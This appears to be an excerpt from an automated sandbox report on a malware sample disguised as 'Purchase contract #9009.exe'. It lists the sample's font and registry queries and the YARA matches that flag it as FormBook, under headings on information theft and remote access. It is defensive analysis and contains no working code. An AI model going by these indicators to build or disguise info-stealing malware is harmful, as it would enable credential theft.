Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, type: MEMORY